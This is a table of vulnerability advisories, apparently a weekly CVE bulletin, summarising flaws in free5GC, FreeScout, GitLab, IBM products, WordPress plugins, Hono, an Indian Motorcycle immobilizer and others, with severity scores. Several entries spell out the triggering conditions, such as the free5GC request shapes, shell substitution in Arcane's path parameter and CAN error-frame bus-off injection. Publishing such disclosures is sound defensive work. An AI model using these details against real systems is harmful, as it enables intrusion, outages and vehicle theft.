| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's PCF POST /npcf-policyauthorization/v1/app-sessions handler panics on a single authenticated request whose ascReqData.suppFeat == "1" (enabling traffic-routing feature negotiation) and whose medComponents entries supply an afAppId but NO AfRoutReq. The create path then calls provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, ...) with routeReq == nil and dereferences routeReq.RouteToLocs (and other fields) without a nil check, causing runtime error: invalid memory address or nil pointer dereference. Gin recovery converts the panic into HTTP 500. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44317 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44318 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44324 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks _, ok = UESubsData.EeSubscriptionCollection[subsId] and sets a 404 problem-details on the miss path, but then continues to UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 4.3 | CVE-2026-44323 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.219, the password reset endpoint returns visually distinct responses depending on whether the submitted email address belongs to an existing user account, allowing unauthenticated attackers to enumerate valid helpdesk agent email addresses. This vulnerability is fixed in 1.8.219. | 2026-05-29 | 5.3 | CVE-2026-45294 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.221, while investigating the ThreadPolicy::delete issue reported previously, the same missing mailbox membership check was found in the sibling ThreadPolicy::edit method. A user with the PERM_EDIT_CONVERSATIONS permission who created a message or internal note in Mailbox A can rewrite that thread's body after an administrator removes them from Mailbox A, because the policy checks only authorship and a global permission flag - not current mailbox membership. This vulnerability is fixed in 1.8.221. | 2026-05-29 | 4.3 | CVE-2026-48810 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.221, FreeScout allows a non-admin user to permanently delete an internal note (private thread) from any conversation, even after that user's access to the mailbox containing the conversation has been revoked. The ThreadPolicy::delete authorization policy does not verify mailbox membership, so a former team member retains destructive write access to notes they created. This vulnerability is fixed in 1.8.221. | 2026-05-29 | 4.3 | CVE-2026-48811 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a cross-site request forgery vulnerability that allows remote attackers to force victims to delete posts by crafting malicious HTML forms. Attackers can create hidden forms targeting tweetdel.php with tweet IDs and automatically submit them to delete arbitrary posts from authenticated user sessions. | 2026-05-25 | 4.3 | CVE-2018-25363 |
| gapgag55--Auto Thumbnails | The Auto Thumbnail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'thumbnails' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on the shortcode's 'width' and 'height' attributes in the athn_thumbnails() function, which are concatenated directly into an HTML <img> tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8899 |
| garber--GBI To Print | The GBI To Print plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0 via the 'div' attribute of the 'gbitoprint' shortcode. This is due to insufficient output escaping in the gbi_toprint_shortcode() function, which concatenates the raw shortcode attribute value directly into an HTML attribute without applying esc_attr() or any other sanitization. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8702 |
| Genetec Inc.--Genetec Security Center | SQL Injection affecting the Access Manager role. | 2026-05-25 | 6.6 | CVE-2026-27768 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. In 1.18.1 and earlier, GET /environments/{id}/volumes/{volumeName}/browse accepts a path query parameter that is passed to a shell command (sh -c "find … | while …") inside an Arcane helper container. The path sanitiser blocks ../ traversal but does not strip Bourne-shell metacharacters such as $() or backticks, and strconv.Quote only escapes Go string metacharacters, not shell substitution sequences. Any authenticated user with access to a browseable volume can execute arbitrary commands inside the helper container; command output is reflected back in the 500 error body. | 2026-05-29 | 6.3 | CVE-2026-45626 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.1 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user to cause denial of service due to insufficient validation. | 2026-05-27 | 6.5 | CVE-2026-1402 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an unauthorized user to enumerate private projects due to incorrect authorization checks. | 2026-05-27 | 5.3 | CVE-2026-6713 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 11.5 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user with developer-role permissions to access sensitive deployment data on projects due to improper authorization checks. | 2026-05-27 | 4.3 | CVE-2026-2601 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.7 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that when foundational flows were enabled at the group level, could have allowed an authenticated user with developer-role permissions to bypass flow restrictions under certain conditions. | 2026-05-27 | 4.3 | CVE-2026-5296 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.7 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user to access CI data from a different ref type than intended. | 2026-05-27 | 4.3 | CVE-2026-8716 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed a blocked Project Access Token to continue accessing private resources due to incorrect authorization enforcement. | 2026-05-28 | 4.3 | CVE-2026-9807 |
| GNU--LibreDWG | A vulnerability was found in GNU LibreDWG up to 0.14. The affected element is the function read_2004_compressed_section of the file src/decode.c of the component Dwgread Utility. Performing a manipulation results in heap-based buffer overflow. The attack is only possible with local access. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 5.3 | CVE-2026-9500 |
| GNU--LibreDWG | A vulnerability was identified in GNU LibreDWG up to 0.14. This affects the function decompress_R2004_section of the file src/decode.c of the component Dwgread Utility. The manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The identifier of the patch is e501cb9926c1e9a07a0d1cc997f3e69e9be801c9. To fix this issue, it is recommended to deploy a patch. | 2026-05-25 | 5.3 | CVE-2026-9502 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.1 and 6.0.0-alpha.4, a path validation issue in go-git could allow crafted repository data to affect files outside the intended checkout target, including the repository's .git directory. These validations were introduced in upstream Git years ago, so the vulnerability arose from go-git drifting from those checks. This vulnerability is fixed in 5.19.1 and 6.0.0-alpha.4. | 2026-05-27 | 5.4 | CVE-2026-45571 |
| godlessons--WP AutoBuzz | The WP AutoBuzz plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This vulnerability bypasses WordPress's DISALLOW_UNFILTERED_HTML protection because the unsanitized value is written directly via update_option at the plugin level, entirely outside of WordPress post content handling. | 2026-05-27 | 6.1 | CVE-2026-8911 |
| golzarrahman--GNTT Post Title Ticker | The GNTT Post Title Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0 via the `title-ticker-slide`, `title-ticker-fade`, and `title-ticker-typing` shortcodes. This is due to insufficient input sanitization and output escaping on shortcode attributes (notably `border`, `width`, `height`, `header_background`, `header_text_color`, and `id`) within the `gntt_title_ticker_slide()`, `gntt_title_ticker_fade()`, and `gntt_title_ticker_typing()` functions. None of these attribute values are passed through `esc_attr()` or any other escaping function before being concatenated into HTML output. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8701 |
| gradio-app--gradio | Gradio before version 6.15.0 contains a cookie injection vulnerability that allows remote attackers to perform cross-Space session fixation by exploiting a shared module-level HTTP client used across all users in the reverse proxy endpoint. Attackers controlling any HF Space can return a parent-domain cookie that the shared client stores and automatically replays into all subsequent proxy requests to other legitimate Spaces, affecting all users of the same Gradio deployment. | 2026-05-27 | 6.8 | CVE-2026-48545 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, an open redirect vulnerability in Snipe-IT allows attackers to redirect users to malicious sites via unvalidated HTTP Referer header stored in session variable. This vulnerability is fixed in 8.4.1. | 2026-05-26 | 5.9 | CVE-2026-44833 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, users with component view access could be impacted by an unescaped notes column, resulting in cross-site scripting (XSS). This vulnerability is fixed in 8.4.1. | 2026-05-26 | 4.8 | CVE-2026-44831 |
| haojing8312--WorkClaw | A vulnerability was determined in haojing8312 WorkClaw up to 0.6.4. This affects the function is_dangerous of the file apps/runtime/src-tauri/src/agent/tools/bash.rs of the component Blacklist Handler. Executing a manipulation can lead to os command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 6.3 | CVE-2026-9565 |
| hasanazizul--3D Viewer 3D Model Viewer Augmented Reality Virtual Try On | The 3D Viewer - 3D Model Viewer - Augmented Reality - Virtual Try On plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify all plugin settings by writing arbitrary data to the ar_try_on_settings option in the database via the /wp-json/ar_try_on/v1/settings REST endpoint. | 2026-05-28 | 4.3 | CVE-2026-8682 |
| HCLSoftware--BigFix Remote Control Server | A misconfigured Content Security Policy (CSP) in HCL BigFix Remote Control Server WebUI (versions 10.1.0.0442 and earlier) fails to define directives without fallbacks, allowing attackers to bypass intended security restrictions and load unauthorized resources. | 2026-05-27 | 4 | CVE-2026-21785 |
| hemant6488--CodeIgniter-StudentManagementSystem | A vulnerability was identified in hemant6488 CodeIgniter-StudentManagementSystem. The impacted element is the function addStudent of the file view_students.php of the component Students Controller. The manipulation of the argument Name leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 4.3 | CVE-2026-9518 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, does not apply ACLs on certain API endpoints related to platform mail notfications. | 2026-05-27 | 6.3 | CVE-2026-2254 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, expose Hadoop cluster credentials in plain text through the Cluster Test API. Although the user should not see those explicitly, the defect is mitigated by the fact the user can already leverage those credentials to submit jobs under the same account through the backend API. | 2026-05-27 | 4.3 | CVE-2026-2255 |
| Hitachi--Hitachi Ops Center Analyzer | Missing password field masking vulnerability in Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view, Hitachi Ops Center Analyzer probe modules), Hitachi Ops Center Analyzer viewpoint, Hitachi Infrastructure Analytics Advisor (Data Center Analytics, Analytics probe modules). This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.8-00; Hitachi Ops Center Analyzer viewpoint: from 10.8.1-00 before 11.0.8-00; Hitachi Infrastructure Analytics Advisor: from 3.2.0-00 before 11.0.8-00. | 2026-05-26 | 4.6 | CVE-2026-3314 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the ip-restriction middleware (hono/ip-restriction) compares incoming IP addresses against configured deny and allow rules using string equality after partial normalization. Non-canonical IPv6 representations of an address already listed in a static rule - such as compressed forms, explicit-zero forms, or hex-notation IPv4-mapped addresses - do not match the normalized rule entry, causing the rule to be silently skipped. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 5.3 | CVE-2026-47674 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, app.mount() strips the mount prefix from the incoming request path using the raw URL pathname, while route matching is performed against the percent-decoded path. This inconsistency causes the prefix to be stripped at the wrong position when the path contains percent-encoded multi-byte characters, resulting in the mounted sub-application receiving an incorrect path. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 5.3 | CVE-2026-47676 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the jwt and jwk middlewares do not verify that the Authorization header value uses theBearer scheme. Any two-part header value - regardless of the scheme name in the first position - proceeds to JWT verification. A request presenting a valid JWT under a non-Bearer scheme identifier (such as Basic or Token) is authenticated identically to a correctly formed Bearer request. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 4.8 | CVE-2026-47673 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the serialize() function in hono/cookie validates domain and path options against characters that corrupt Set-Cookie header syntax (;, \r, \n), but does not apply the same validation to sameSite and priority. An application that passes user-controlled input into either option may produce a Set-Cookie response header containing attacker-chosen additional attributes. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 4.3 | CVE-2026-47675 |
| huankong--hk_shortcode | The hk_shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title-plane' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes in the huankong_post_short_title_plane() function, where the 'title' attribute is concatenated directly into HTML output without any escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8886 |
| IBM--App Connect Enterprise | IBM App Connect Enterprise 13.0.1.0 through 13.0.7.0 stores potentially sensitive information in log files that could be read by a local user. | 2026-05-27 | 5.5 | CVE-2026-5515 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a potential arbitrary file read in the asperahttpd component. An authenticated user may be able to take advantage of this vulnerability to access files in the server's local storage that they should not have access to. | 2026-05-27 | 6.5 | CVE-2026-9035 |
| IBM--Cloud APM, Base Private | IBM Cloud APM, Base Private 8.1.4 and IBM Cloud APM, Advanced Private 8.1.4 IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in the data query logic of the Fenced environment. | 2026-05-27 | 6.5 | CVE-2026-3676 |
| IBM--Cloud Pak for Data System - Cyclops | IBM Cloud Pak for Data System - Cyclops 11.3.0.2 through Interim Fix 002 IBM Cloud Pak for Data System uses default passwords default passwords from the manufacturing process for use during the installation process, which could allow an attacker to bypass authentication. | 2026-05-26 | 5.3 | CVE-2025-36221 |
| IBM--Cloud Pak for Data System - Cyclops | IBM Cloud Pak for Data System - Cyclops 11.3.0.2 through Interim Fix 002 IBM Cloud Pak for Data System is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2026-05-26 | 4.3 | CVE-2025-36220 |
| IBM--Cognos Analytics | IBM Cognos Analytics 11.2.0, 12.0, and 12.1.0 and IBM Cognos Transformer 12.0, 11.2.4, and 12.1.0 is vulnerable to stored cross-site scripting (XSS) in Cognos Adminstration. This vulnerability allows a privileged user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-05-26 | 6.4 | CVE-2025-36126 |
| IBM--Cognos Analytics | IBM Cognos Analytics 11.2.0, 11.2.4, 12.0, and 12.1.0 and IBM Cognos Transformer 11.2.4, 12.0, and 12.1.0 are vulnerable to cross-site scripting (XSS). This vulnerability allows a remote attacker to inject arbitrary JavaScript code into the web user interface, which may alter the intended functionality and could lead to the disclosure of credentials within a trusted session. | 2026-05-27 | 5.4 | CVE-2025-3633 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to running out of memory when executing certain queries with MDC tables. | 2026-05-27 | 6.5 | CVE-2026-6052 |
| IBM--Db2 | IBM Db2 12.1.0 through 12.1.4 is vulnerable to authorization bypass when uploading to a remote object storage path with a special query. | 2026-05-27 | 6.5 | CVE-2026-6938 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 for Linux, UNIX and Windows (includes DB2 Connect Server) stores potentially sensitive information in log files that could be read by a local user. | 2026-05-26 | 5.5 | CVE-2025-13755 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a denial of service when executing a specially crafted query with a small statement heap. | 2026-05-27 | 5.5 | CVE-2026-6051 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a denial of service when a specially crafted query is run with range partitioned tables. | 2026-05-27 | 5.5 | CVE-2026-6053 |
| IBM--Financial Transaction Manager for SWIFT Services for Multiplatforms | IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4.0 through 3.2.4.15 IBM Financial Transaction Manager SWIFT is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-05-26 | 5.4 | CVE-2025-36148 |
| IBM--Guardium Data Protection | IBM Guardium Data Protection 12.2.1, and 12.2.2 's add-on feature of Guardium Data Protection named "Long Term Retention" (LTR) can expose sensitive credentials in debug mode. | 2026-05-27 | 6.5 | CVE-2026-8405 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to denial of service via the optional module mod_fastcgi module. | 2026-05-26 | 6.2 | CVE-2026-8852 |
| IBM--i | IBM i 7.6, 7.5, 7.4, and 7.3 s vulnerable to a denial-of-service attack due to uncontrolled recursion in the Integrated Language Environment (ILE) compiler. An authenticated attacker could exploit this vulnerability by compiling specially crafted source code containing a specific combination of statements. | 2026-05-27 | 6.5 | CVE-2026-6936 |
| IBM--MQ Operator | IBM MQ Operator SC2: v3.2.0 through 3.2.23CD: v3.3.0, v3.4.0, v3.4.1, v3.5.0, v3.5.1 - v3.5.3, v3.6.0 - v3.6.4, v3.7.0 - v3.7.2, v3.8.0, v3.8.1, v3.9.0, v3.9.1LTS: v2.0.0 - 2.0.29 and IBM supplied MQ Advanced container images SC2: 9.4.0.6 through r1, 9.4.0.6-r2, 9.4.0.7-r1, 9.4.0.10-r1, 9.4.0.10-r2, 9.4.0.11-r1, 9.4.0.11-r2, 9.4.0.11-r3, 9.4.0.12-r1, 9.4.0.15-r1 - 9.4.0.15-r4, 9.4.0.16-r1, 9.4.0.16-r2, 9.4.0.17-r1, 9.4.0.17-r2, 9.4.0.20-r1CD: 9.4.1.0-r1, 9.4.1.0-r2, 9.4.1.1-r1, 9.4.2.0-r1, 9.4.2.0-r2, 9.4.2.1-r1, 9.4.2.1-r2, 9.4.3.0-r1, 9.4.3.0-r2, 9.4.3.1-r1 - 9.4.3.1-r3, 9.4.4.0-r1 - 9.4.4.0-r4, 9.4.4.1-r1, 9.4.5.0-r1, 9.4.5.0-r2LTS: 9.3.0.0-r1, 9.3.0.0-r2, 9.3.0.0-r3, 9.3.0.1-r1, 9.3.0.1-r2, 9.3.0.1-r3, 9.3.0.1-r4, 9.3.0.3-r1, 9.3.0.4-r1, 9.3.0.4-r2, 9.3.0.5-r1, 9.3.0.5-r2, 9.3.0.5-r3, 9.3.0.6-r1, 9.3.0.10-r1, 9.3.0.10-r2, 9.3.0.11-r1,9.3.0.11-r2, 9.3.0.15-r1, 9.3.0.16-r1, 9.3.0.16-r2, 9.3.0.17-r1, 9.3.0.17-r2, 9.3.0.17-r3, 9.3.0.20-r1, 9.3.0.20-r2, 9.3.0.21-r1, 9.3.0.21-r2, 9.3.0.21-r3, 9.3.0.25-r1, 9.4.0.0-r1, 9.4.0.0-r2, 9.4.0.0-r3, 9.4.0.5-r1, 9.4.0.5-r2 IBM MQ stores potentially sensitive information in log files that could be read by a local user. | 2026-05-27 | 5.1 | CVE-2026-2607 |
| IBM--Operations Analytics - Log Analysis | IBM Operations Analytics - Log Analysis 1.3.5.0, 1.3.5.1, 1.3.5.2, 1.3.5.3, 1.3.6.0, 1.3.6.1, 1.3.7.0, 1.3.7.1, 1.3.7.2, and 1.3.8.0, 1.3.8.1, 1.3.8.2, 1.3.8.3, 1.3.8.4 IBM SmartCloud Analytics - Log Analysis does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. | 2026-05-27 | 5.9 | CVE-2024-40684 |
| IBM--SDI | IBM SDI 7.2.0.0 through 7.2.0.14 and IBM Security Directory Integrator 10.0.0.0 through 10.0.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2026-05-27 | 5.3 | CVE-2024-28765 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.3.1 IBM Lakehouse does not properly restrict inbound and outbound connections which could allow an attacker to transfer or modify files without restrictions. | 2026-05-26 | 5.4 | CVE-2025-36145 |
| IBM--webMethods Integration (on prem) -Integration Server | IBM webMethods Integration (on prem) -Integration Server 10.15 through IS_10.15_Core_Fix2611.1 to IS_11.1_Core_Fix10 IBM webMethods Integration is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-05-26 | 5.4 | CVE-2025-14290 |
| IBM--WebSphere Application Server - Liberty | IBM WebSphere Application Server - Liberty 19.0.0.7 through 26.0.0.5 and IBM WebSphere Application Server 9.0, and 8.5 and WebSphere Application Server Liberty are vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. | 2026-05-27 | 4.8 | CVE-2026-4410 |
| IBM--WebSphere Application Server - Liberty | IBM WebSphere Application Server - Liberty 22.0.0.11 through 26.0.0.5 IBM WebSphere Application Server Liberty could allow a remote attacker to bypass security under limited conditions by exploiting a specific timing window. | 2026-05-27 | 4.4 | CVE-2026-5516 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Expected behavior violation in the in-vehicle network of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the motorcycle's anti-theft shutdown by forcing the Wireless Control Module (WCM) into the CAN bus-off state. Using a well-known CAN error-frame injection technique against a periodic WCM transmission, the attacker drives the WCM CAN controller's transmit error counter past the bus-off threshold, after which the WCM stops transmitting all messages, including the shutdown command. Peer ECUs do not interpret WCM silence as a security event and continue normal operation, allowing the motorcycle to be operated despite the immobilizer never having been unlocked. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49316 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Weak authentication in the Wireless Control Module (WCM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with read access to the in-vehicle network to recover the user-set unlock PIN by passively observing a single PIN authentication exchange. The Infotainment Digital Round display computes its response using a non-cryptographic operation rather than a cryptographic challenge-response, so the PIN is mathematically derivable from one captured exchange, defeating the motorcycle's primary user-authentication control. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.3 | CVE-2026-49322 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Weak authentication between the Wireless Control Module (WCM) and the Engine Control Module (ECM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with read access to the in-vehicle network to recover the per-vehicle ECM immobilizer secret by passively observing a single seed/key exchange. The WCM derives its response using a reversible, non-cryptographic operation rather than a cryptographic challenge-response, so the persistent immobilizer secret can be reconstructed from one captured exchange. With this secret the attacker can authenticate to the ECM independently of the WCM and start the engine, defeating the immobilizer. Specific protocol details have been withheld pending vendor remediation. | 2026-05-29 | 4.3 | CVE-2026-49323 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Uncontrolled resource consumption in the Wireless Control Module (WCM) of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker with write access to the in-vehicle network to permanently immobilize the motorcycle. The WCM enforces a brute-force lockout on the immobilizer authentication algorithm, but the lockout counter is reachable by any unauthenticated message, has no session binding, and does not reset on power cycle. An attacker can deliberately trip the lockout with a small number of crafted frames, leaving the bike un-startable until dealer service. Specific thresholds have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49324 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Improper handling of physical conditions in the bike-shutdown control of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows a physical attacker with access to the Wireless Control Module (WCM) wiring harness to bypass the anti-theft shutdown. The WCM signals shutdown to a peer ECU via a falling-edge voltage transition on a dedicated wire pair. The receiving ECU does not distinguish between an active shutdown pulse and an open-circuit / disconnected condition; interrupting the relevant wires leaves the motorcycle fully operable even though the WCM never validated the rider's PIN. Specific connector details have been withheld pending vendor remediation. | 2026-05-29 | 4.6 | CVE-2026-49325 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has a Path Traversal vulnerability, allowing unauthenticated remote attackers to read file names under arbitrary path by exploiting an Absolute Path Traversal vulnerability. | 2026-05-29 | 5.3 | CVE-2026-10075 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Read vulnerability, allowing privileged local attackers to exploit Relative Path Traversal to download arbitrary system files. | 2026-05-29 | 4.9 | CVE-2026-10074 |
| ipld--go-ipld-prime | go-ipld-prime is an implementation of the InterPlanetary Linked Data (IPLD) spec interfaces, a batteries-included codec implementations of IPLD for CBOR and JSON, and tooling for basic operations on IPLD objects. Prior to 0.23.0, the DAG-CBOR and DAG-JSON decoders recurse on each nested map or list without a depth limit. A payload containing deeply nested collections causes the decoder to recurse once per level, growing the goroutine stack until the Go runtime terminates the process with a fatal stack overflow (distinct from a recoverable panic). This vulnerability is fixed in 0.23.0. | 2026-05-27 | 6.2 | CVE-2026-42328 |
| ITP Technology--ITS Intelligent SCADA System | ITS Intelligent SCADA System developed by ITP Technology has a Stored Cross-Site Scripting vulnerability, allowing privileged remote attackers to inject persistent JavaScript codes that are executed in users' browsers upon page load. | 2026-05-29 | 4.8 | CVE-2026-10057 |
| ITP Technology--ITS Intelligent SCADA System | ITS Intelligent SCADA System developed by ITP Technology has a Stored Cross-Site Scripting vulnerability, allowing privileged remote attackers to inject persistent JavaScript codes that are executed in users' browsers upon page load. | 2026-05-29 | 4.8 | CVE-2026-10058 |
| itsourcecode--Courier Management System | A vulnerability was found in itsourcecode Courier Management System 1.0. The affected element is an unknown function of the file /parcel_list.php. Performing a manipulation of the argument s results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-05-27 | 6.3 | CVE-2026-9607 |
| itsourcecode--Electronic Judging System | A vulnerability was determined in itsourcecode Electronic Judging System 1.0. This issue affects some unknown processing of the file /admin/judges.php. This manipulation of the argument fname causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-05-26 | 4.3 | CVE-2026-9527 |
